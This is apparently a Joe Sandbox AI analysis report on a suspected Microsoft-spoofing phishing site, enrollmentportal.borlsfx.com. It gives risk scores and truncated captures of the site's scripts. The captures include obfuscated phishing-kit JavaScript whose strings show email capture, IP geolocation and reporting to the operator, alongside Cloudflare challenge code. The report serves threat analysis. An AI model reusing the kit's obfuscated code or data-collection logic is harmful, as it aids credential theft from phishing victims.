URL: https://enrollmentportal.borlsfx.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://enrollmentportal.borlsfx.com |
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators."
} |
(function(_0x254620,_0xf9497b){const _0x520f86=_0x254620();function _0xefca25(_0x4dee07,_0x25f4c7,_0xda52c2,_0x473d2d){return _0x156c(_0xda52c2- -0x15c,_0x4dee07);}function _0x3ba1bc(_0x46cc29,_0xf4d978,_0x1ae16e,_0xd317a3){return _0x156c(_0x1ae16e- -0x11e,_0xf4d978);}while(!![]){try{const _0x4535a5=-parseInt(_0x3ba1bc(0x34,0x22,0x2c,0x1e))/(-0x731*-0x1+-0x1265+-0x13*-0x97)+-parseInt(_0xefca25(-0x1e,-0x22,-0xf,-0x1f))/(-0x1*-0x5b9+-0x42e*0x3+0x6d3)+-parseInt(_0xefca25(0x0,-0x26,-0x4,-0x1a))/(-0x2*0xf4f+-0x1b18+0x83f*0x7)+-parseInt(_0x3ba1bc(0x9,-0x7,0x1e,0x8))/(-0x1a5*-0x3+-0x1*-0x15c5+-0x1ab0)+-parseInt(_0x3ba1bc(0x93,0x88,0x65,0x87))/(-0x269+-0x161b*-0x1+-0x13ad)+-parseInt(_0xefca25(0x1e,-0x24,0x8,0x6))/(0xb5*-0x1+0x20da+-0x201f)+parseInt(_0x3ba1bc(-0x3,0x3e,0x1b,0xe))/(-0xaba*0x1+0x226b+-0x1d2*0xd);if(_0x4535a5===_0xf9497b)break;else _0x520f86['push'](_0x520f86['shift']());}catch(_0x2a0ad6){_0x520f86['push'](_0x520f86['shift']());}}}(_0x1cb9,0x1*-0x1ccf81+-0x124063+0x3df3f0));function _0x156c(_0x2f3a35,_0x16a8a0){const _0x3d19d4=_0x1cb9();return _0x156c=function(_0x21acea,_0x5cc01f){_0x21acea=_0x21acea-(0x1*0xf3f+-0x1*0x1e47+-0x567*-0x3);let _0x11b2fe=_0x3d19d4[_0x21acea];if(_0x156c['YFVNED']===undefined){var _0xbef711=function(_0x5ea653){const _0x586786='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x17cdf9='',_0x2b8316='',_0x4815ad=_0x17cdf9+_0xbef711;for(let 
_0xb3dd45=0x14ce+-0x1*0x259a+-0x32*-0x56,_0x4a65b3,_0xd70357,_0x35153d=-0x23c3+-0x65b+0x2a1e;_0xd70357=_0x5ea653['charAt'](_0x35153d++);~_0xd70357&&(_0x4a65b3=_0xb3dd45%(0x19d8*0x1+-0x2707+0xd33)?_0x4a65b3*(0x30a+-0x267d+0x23b3)+_0xd70357:_0xd70357,_0xb3dd45++%(0x1cfa+-0x50*0x52+-0x2*0x1ab))?_0x17cdf9+=_0x4815ad['charCodeAt'](_0x35153d+(-0x1634+0x1d7a+-0x73c))-(-0x20ae+0x1948+0x770)!==-0x172*-0x17+0x1852+0x1cc8*-0x2?String['fromCharCode'](-0x21ec+0x2*0x946+0x17d*0xb&_0x4a65b3>>(-(-0x8*0x1ba+-0x361+0x103*0x11)*_0xb3dd45&-0x382+0x1*-0x2f9+-0x1*-0x681)):_0xb3dd45:0x16e0+-0xa62+-0x7b*0x1a){_0xd70357=_0x586786['indexOf'](_0xd70357);}for(let _0x41ab0=-0x4*0x1cb+0x4*0x513+-0xd20,_0x529229=_0x17cdf9['length'];_0x41ab0<_0x529229;_0x41ab0++){_0x2b8316+='%'+('00'+_0x17cdf9['charCodeAt'](_0x41ab0)['toString'](-0x22b4+-0xf73+-0xf*-0x359))['slice'](-(0x14*-0x10a+0x511+0xfb9));}return decodeURIComponent(_0x2b8316);};_0x156c['MhOPaY']=_0xbef711,_0x2f3a35=arguments,_0x156c['YFVNED']=!![];}const _0x29bfe2=_0x3d19d4[-0x15ea+0x726*0x4+-0x2d*0x26],_0x4fa678=_0x21acea+_0x29bfe2,_0x4b1202=_0x2f3a35[_0x4fa678];if(!_0x4b1202){const _0x4c9407=function(_0x3395e8){this['OiIKCb']=_0x3395e8,this['LgElwl']=[0x2*-0xb50+0x1fb9+-0x918,0xcd1+-0x1*0x21a0+0x14cf,-0x2*-0xa9f+0x2e1*0x1+-0xf7*0x19],this['IHZWlo']=function(){return'newState';},this['AjOvXE']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['ahMLVd']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x4c9407['prototype']['hrYWWW']=function(){const _0x172698=new RegExp(this['AjOvXE']+this['ahMLVd']),_0x5ed142=_0x172698['test'](this['IHZWlo']['toString']())?--this['LgElwl'][-0x27b*0x4+-0x1f*0xc9+0x2244]:--this['LgElwl'][0x1*0xf44+-0xe57+-0xed];return this['NuZUYJ'](_0x5ed142);},_0x4c9407['prototype']['NuZUYJ']=function(_0x4d4820){if(!Boolean(~_0x4d4820))return _0x4d4820;return this['RKYxCq'](this['OiIKCb']);},_0x4c9407['prototype']['RKYxCq']=function(_0x4aadf8){for(let 
_0xd046e2=0x2504+0x6bd*0x3+-0x393b*0x1,_0x4850ad=this['LgElwl']['length'];_0xd046e2<_0x4850ad;_0xd046e2++){this['LgElwl']['push'](Math['round'](Math['random']())),_0x4850ad=this['LgElwl']['length'];}return _0x4aadf8(this['LgElwl'][-0x1a2f*-0x1+0x24bb+-0x3eea]);},new _0x4c9407(_0x156c)['hrYWWW'](),_0x11b2fe=_0x156c['MhOPaY'](_0x11b2fe),_0x2f3a35[_0x4fa678]=_0x11b2fe;}else _0x11b2fe=_0x4b1202;return _0x11b2fe;},_0x156c(_0x2f3a35,_0x16a8a0);}const _0x4f4b8f=(function(){const _0x30aea5={};_0x30aea5['oiCKX']=function(_0x2f5e25,_0x2993e6){return _0x2f5e25===_0x2993e6;};function _0xb5ca78(_0x23f6cf,_0x2ba99b,_0x5eb24,_0x4a4b7e){return _0x156c(_0x5eb24-0x1ba,_0x4a4b7e);}_0x30aea |
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the script, suggests this is a highly suspicious and potentially malicious piece of code."
} |
/**
 * Bootstrap that loads /cdn-cgi/challenge-platform/scripts/jsd/main.js inside a
 * hidden 1x1 iframe appended to the current page.
 *
 * Analyst notes:
 * - The script src is a root-relative path, so the request goes to the host
 *   that served this page, not to a separate third-party domain.
 * - `t` in __CF$cv$params is base64 for the text "1734451314.000000", which
 *   reads as a Unix timestamp; `r` looks like a Cloudflare Ray ID (TODO confirm).
 * - NOTE(review): the /cdn-cgi/challenge-platform/ path and the __CF$cv$params
 *   name match the loader Cloudflare adds to proxied sites, so this block on its
 *   own says nothing about what the page's own scripts do.
 */
(function () {
  var frame;

  // Writes the inline loader into the hidden frame's <head>.
  function injectLoader() {
    var frameDoc = frame.contentDocument || frame.contentWindow.document;
    if (!frameDoc) {
      return;
    }
    var loader = frameDoc.createElement('script');
    // Inline source runs in the frame's own global scope, so its `var a` does not touch this closure.
    loader.innerHTML = "window.__CF$cv$params={r:'8f38226b2e834414',t:'MTczNDQ1MTMxNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";
    frameDoc.getElementsByTagName('head')[0].appendChild(loader);
  }

  // Nothing to attach the frame to yet: do nothing at all.
  if (!document.body) {
    return;
  }

  frame = document.createElement('iframe');
  frame.height = 1;
  frame.width = 1;
  frame.style.position = 'absolute';
  frame.style.top = 0;
  frame.style.left = 0;
  frame.style.border = 'none';
  frame.style.visibility = 'hidden';
  document.body.appendChild(frame);

  if ('loading' !== document.readyState) {
    // Document already parsed: inject immediately.
    injectLoader();
  } else if (window.addEventListener) {
    document.addEventListener('DOMContentLoaded', injectLoader);
  } else {
    // Legacy fallback: chain onto any existing onreadystatechange handler and
    // restore it once the document has left the 'loading' state.
    var previous = document.onreadystatechange || function () {};
    document.onreadystatechange = function (evt) {
      previous(evt);
      if ('loading' !== document.readyState) {
        document.onreadystatechange = previous;
        injectLoader();
      }
    };
  }
})();
|
URL: https://challenges.cloudflare.com/turnstile/v0/b/7... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles communication between the challenge widget and the parent window, which is a legitimate use case. While the script uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a Cloudflare challenge, and the risk score is low."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '9f4ou',
chlApiSitekey: '0x4AAAAAAA2NEz0HHMhsdZW9',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '.gU3T7F2jTaZ6gacWMQaVx0qj9_MsHBga7NzTKIMPFw-1734451320-1.3.1.1-k3ORiUEYLNbYGFGhrLwZcWeKvbAf0no96rec4fsYEb8',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f382291392441bd',
cH: 'm0qhIkXYyyo7o3iYmAL_kvCYAYRgmHC_gUZsSPoWg.M-1734451320-1.1.1.1-pA7LZPSz4jXPR_fROB_C6ZZwSpyCupipnZZz.Ga8I0wBT7MOv5fJMMcxp6YTVMdJ',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'SrIe0DE6EPfeghIFNfe_tLn7n.MMr8Z5PrvupMrUdSw-1734451320-1.1.1.1-W8AgmxWQugHefTMPjvnAZGLPo4DeWiSoDCn_x1_.3IRaEAWyOAJnfDCD.1BX41MPbSg.L9NwnklzKiHC0x_19zBmNKnSCqXpwqL8GA6RAsEDPE9vfUnCqjyFW4CXedLBWLoBUkG4Mlp_5vZiCjARZu.yk56vlcPV.2AC7iLZVXVxB.LxEb.JFQ.fKK6E.i.215q7fBQn4lM5N0r3IAsNMAsqIvnwGH208DCZ05B3QiiB2BfbL.r.tJkybk8f7kYrenME4KCoHAx3t3dcArIrLt4HADAi16bwv970nl2K4v.o1lAE584Ji5dhASGh0vch78iM7eDUAxFn.HtZDneldi_FLUzdE7x0oqevOOnun5XDZJSvqNhxAoMl.22O4lZl2VJt_XmeSEK6S9JLm54AAXuOxCJM7ZFLhnlk18laNmdRBbWfXMa1bg8g8OhDHe9nNt5rX9Qxn2apg21o0ZM2LqZqHDn.3RR3rbiPYnxMaojAFXGzgtkgdVQMc5CtWNqXoVhZ5GLoJ.8sGAtfyzwMcx3xpV2hJMR3Wfwa6wjXN2S2mNYKRCMaPMRxVs3ghvDRU0UjNTnp.ZL3oFNx22Zx_cyHJUyeYN05Yhk54XvvyrT1CLxAcVGiNSAGoiW15Ex47b6wXnyJ7pnmBoXj2mbeZ6f2K.BNwqAoyf35nX9JZXmiGB9pYuxPRidRyXtV0CrMXBBKmlCExAb8JrWxqi8WhBRaoyX1HLgw74yWLU6PfsRbUAQu9VrKFNiF7E6FrhqOvAvFtW4ssjBZgoTb3r_wcD8quabFl3afxIkqyOwxQeNe2KZWXuWg_vkx2YecztsjEuJOk5lD0178DjXAwaTcXzO_jvOGDLlw.ePpXBholcDCSI14o7lBqZyUgCXE_uD7xbpTb.cCDSsjVJoD1S5zF9zikV_JQjQfdEWSXPa7Q5ph2lc8C4Nf1OMX3BSpO_HegYG1l9_ug5sRMGKV7qEhzcDe5vNOKb4fEiiFo8Ij8hyesAuCbbbGD7u8vqUA4FqTohVPSs197I5bomzE0lTFFXM6YaEbLD1zHW0MgckwXsOi13rUC19o7TvWh11zqUHqerGDZ5317P0w4RKObr1iU2ybnel7KTX1DEp2Rdn3WEK7rzGUNWmSztL.vntrDOxJBuYZRGP38V5PccgB1zHPVoxL_QRBs_zT08yNQEG.aKO3hNaTu_UaRbbR4fbEdacv9Bj1uak7p8jKO4q7iBuHXGR0y.qZ0VAE5qJQ.lfo3f0cpqG1DH3DW0028u1km0em5r.UJ7gqxbJJfrexRbRDSqBfH_1lLK5bNKrHrd0LfR7ypgEqG0QFlBLFFc46WMe1V5B_sWMwoHQKr_yJG.HwUJkbTWyYvpk.ewwbo_it8NjPoR0fSD.w.gZP4glHvVSE2U0w20G_gmJnjWSyn9PYPQ',
cITimeS: '1734451320',
// Asks the embedding page to reload the widget by posting a 'reloadRequest'
// message to window.parent; does nothing when there is no parent reference.
// NOTE(review): the target origin is "*", so the payload (including nextRcV)
// is delivered to the parent window whatever origin it currently has.
refresh: function(){
var host = window['parent'];
if (!host) {
return;
}
var reloadRequest = {
source: 'cloudflare-challenge',
widgetId: '9f4ou',
nextRcV: '.gU3T7F2jTaZ6gacWMQaVx0qj9_MsHBga7NzTKIMPFw-1734451320-1.3.1.1-k3ORiUEYLNbYGFGhrLwZcWeKvbAf0no96rec4fsYEb8',
event: 'reloadRequest',
};
host.postMessage(reloadRequest, "*");
}
};
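/**
 * 'message' listener for the challenge frame: answers a 'meow' ping addressed
 * to this widget with a 'food' reply that echoes the ping's `seq`.
 *
 * @param {MessageEvent} event - incoming message; only `event.data` is read.
 */
var handler = function(event) {
var e = event.data;
// A postMessage payload can be null or undefined; without this guard the
// property reads below throw a TypeError for such messages.
if (e == null) {
return;
}
// NOTE(review): neither event.origin nor event.source (the sending window) is
// checked, so any window holding a reference to this frame can trigger a reply.
// The filter is the payload shape plus the widget id.
if (e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
// Target origin '*': the reply goes to the parent window regardless of its origin.
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
};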
window.addEventListener('message', handler);
}());
|
URL: https://enrollmentportal.borlsfx.com/2e1145bcea/st... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the functionality may be legitimate (e.g., analytics, error reporting), the overall level of suspicious activity is concerning and requires further investigation."
}
The key reasons for the high-risk score are:
1. **Dynamic Code Execution (3 points):** The script uses heavily obfuscated code, which could potentially execute remote or dynamic code via techniques like `eval()` or the `Function` constructor.
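2. **Data Exfiltration (3 points):** The script appears to be sending user data (e.g., device information, email, location) to external domains, which could be a sign of data exfiltration. The string table in the captured script is consistent with this: it contains `https://ipapi.co/json/` (an IP-geolocation lookup), `getEmail`, `userAgent`, `country_name`, `city`, and a `reportUrl` entry in its embedded configuration.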
3. **Obfuscated Code/URLs (3 points):** The script is heavily obfuscated, making it difficult to understand the true intent and functionality.
While the script may have some legitimate use cases, such as analytics or error reporting, the overall level of suspicious behavior outweighs any potential benign functionality. The combination of high-risk indicators suggests that this script requires further investigation and should be treated with caution. |
function _0xe53c(_0x2dcf91,_0x13971e){const _0x11d5ef=_0x11d5();return _0xe53c=function(_0xe53ca8,_0x2a919c){_0xe53ca8=_0xe53ca8-0x1b8;let _0x5b3903=_0x11d5ef[_0xe53ca8];return _0x5b3903;},_0xe53c(_0x2dcf91,_0x13971e);}function _0x11d5(){const _0x2916dc=['backgroundImage','report','value','1681180kEhPkx','getBased','then','back','invisible','device','will\x20submit','charCodeAt','getDomain','forEach','.device','botDetected','detach','items','string','unknown\x20browser','decode','getElementsByName','4708218BvhGdv','submit','none','119PFTeMP','decodeBased','\x27\x20occured\x20at\x20\x27','removeChild','#igp','Error\x20\x27','url(','floor','arrayBuffer','reason','trim','https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png','POST','getUser','getEmail','branding\x20url\x20not\x20defined','Loading...','parse','16aVgExK','<i\x20class=\x22far\x20fa-calendar-alt\x20icon\x22></i>','failure','object','split','11tYnrdT','pow','.browser','type','src','push','apply','prototype','Secured','browser','join','Failed\x20to\x20\x27setBrand\x27','display','email','662410MobuNF','name','15294690GkhoQT','country_name','replace','toDateString','done','createElement','form','search','application/octet-stream','cors','domain-field','addEventListener','add','querySelector','onloadTurnstileCallback','getElementById','render','toStringTag','Module','style','match','city','851048JghHzF','timeStamp','next','https://ipapi.co/json/','2CeJFnb','length','\x27value\x27\x20not\x20given\x20to\x20hex\x20encode','hidden','success','Form\x20not\x20given','omit','innerHTML','fromCharCode','classList','map','get','secure','encode','throw','text-content','childNodes','<i\x20class=\x22fab\x20fa-internet-explorer\x20icon\x22></i>','input','35852770HqOXGd','toLocaleTimeString','Bad\x20base64','substring','load-text','defineProperty','hasOwnProperty','append','test','log','file','.location','hex',"{\"gsk\": \"\", \"csk\": \"0x4AAAAAAA2NEz0HHMhsdZW9\", 
\"domain\": \"login.microsoftonline.com\", \"bg\": \"\", \"eparam\": \"2a6p5,91d04,c5787\", \"isBot\": false, \"emailAlways\": true, \"setBrand\": true, \"brandingUrl\": \"/11c639d16a\", \"reportUrl\": \"/eb076a2412\"}",'You\x20were\x20blocked,\x20please\x20put\x20off\x20your\x20vpn\x20and\x20try\x20again','toString','catch','random','unknown\x20device','files','9864090ckBfDc','userAgent','slice','Unknown\x20type\x20given','includes','innerText','logo','padStart','body','emailError'];_0x11d5=function(){return _0x2916dc;};return _0x11d5();}(function(_0x26d13b,_0xa608bb){const _0x56442b=_0xe53c,_0x1fa0d0=_0x26d13b();while(!![]){try{const _0xafe2ea=parseInt(_0x56442b(0x1e4))/0x1*(-parseInt(_0x56442b(0x218))/0x2)+parseInt(_0x56442b(0x22a))/0x3+-parseInt(_0x56442b(0x23f))/0x4*(parseInt(_0x56442b(0x1c8))/0x5)+parseInt(_0x56442b(0x20b))/0x6+parseInt(_0x56442b(0x22d))/0x7*(parseInt(_0x56442b(0x1e0))/0x8)+parseInt(_0x56442b(0x1ca))/0x9+parseInt(_0x56442b(0x1f7))/0xa*(-parseInt(_0x56442b(0x1ba))/0xb);if(_0xafe2ea===_0xa608bb)break;else _0x1fa0d0['push'](_0x1fa0d0['shift']());}catch(_0x2550e0){_0x1fa0d0['push'](_0x1fa0d0['shift']());}}}(_0x11d5,0xe1cfb),((()=>{'use strict';const _0x10835e=_0xe53c;var _0x451981={'d':(_0x4300b9,_0x3718b8)=>{for(var _0x46160d in _0x3718b8)_0x451981['o'](_0x3718b8,_0x46160d)&&!_0x451981['o'](_0x4300b9,_0x46160d)&&Object['defineProperty'](_0x4300b9,_0x46160d,{'enumerable':!0x0,'get':_0x3718b8[_0x46160d]});},'o':(_0x4a742c,_0x2e935c)=>Object[_0x10835e(0x1c1)][_0x10835e(0x1fd)]['call'](_0x4a742c,_0x2e935c),'r':_0x291354=>{const _0x3c95c4=_0x10835e;'undefined'!=typeof Symbol&&Symbol[_0x3c95c4(0x1db)]&&Object[_0x3c95c4(0x1fc)](_0x291354,Symbol[_0x3c95c4(0x1db)],{'value':_0x3c95c4(0x1dc)}),Object[_0x3c95c4(0x1fc)](_0x291354,'__esModule',{'value':!0x0});}},_0x4ab1a7={};_0x451981['r'](_0x4ab1a7),_0x451981['d'](_0x4ab1a7,{'botDetected':()=>_0x35c60a,'emailError':()=>_0x1ae036});class _0x5c8c4d{static[_0x10835e(0x203)](_0x411924){const 
_0x22ddd9=_0x10835e;if(!_0x411924)t |
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI |
{
"risk_score": 3,
"reasoning": "The script appears to be related to Cloudflare's security challenges, with no high-risk behaviors such as dynamic code execution or data exfiltration. It includes encoded URLs and some obfuscation, which are moderate-risk indicators. However, the context suggests a legitimate purpose related to security challenges, capping the score at 3."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"turnstile_feedback_description":"Send%20Feedback","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_success":"Success%21","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","testing_only":"Testing%20only.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_timeout":"Timed%20out","turnstile_footer_terms":"Terms","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_footer_privacy":"Privacy","human_button_text":"Verify%20you%20are%20human","invalid_domain":"Inv
alid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_expired":"Expired","turnstile_failure":"Error","turnstile_verifying":"Verifying...","turnstile_refresh":"Refresh","turnstile_overrun_description":"Stuck%20here%3F"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eU,eX,eZ,f0,f1,fd,fp,fv,fw,fx,fH,fS,fW,fX,g0,g1,gx,gB,gC,gG,gH,fY,fZ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(890))/1*(parseInt(gI(1346))/2)+parseInt(gI(635))/3+parseInt(gI(1579))/4*(-parseInt(gI(529))/5)+-parseInt(gI(798))/6*(-parseInt(gI(1429))/7)+parseInt(gI(1189))/8+parseInt(gI(1003))/9*(parseInt(gI(805))/10)+parseInt(gI(1853))/11*(-parseInt(gI(733))/12),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,578003),eM=this||self,eN=eM[gJ(570)],eO=function(gK,d,e,f,g){return gK=gJ,d={'BfxAj':function(h,i){return h==i},'SVQJD':function(h,i){return h>i},'paQWg':function(h,i){return i&h},'twJxO':function(h,i){return h^i},'Racdv':function(h,i){return i^h},'plCpW':function(h,i,j){return h(i,j)},'fTcmQ':function(h,i){return h^i},'kftpy':function(h,i,j){return h(i,j)},'pLgjh':gK(489),'WbdQB':function(h,i,j){return h(i,j)},'HIrmW':function(h,i,j){return h(i,j)},'xNVEg':function(h,i){return h-i},'ySgCh':function(h,i){return h>>>i},'nBIEm':function(h,i){return h&i},'KKnlN':function(h,i){return h&i},'bkQGf':function(h,i,j){return 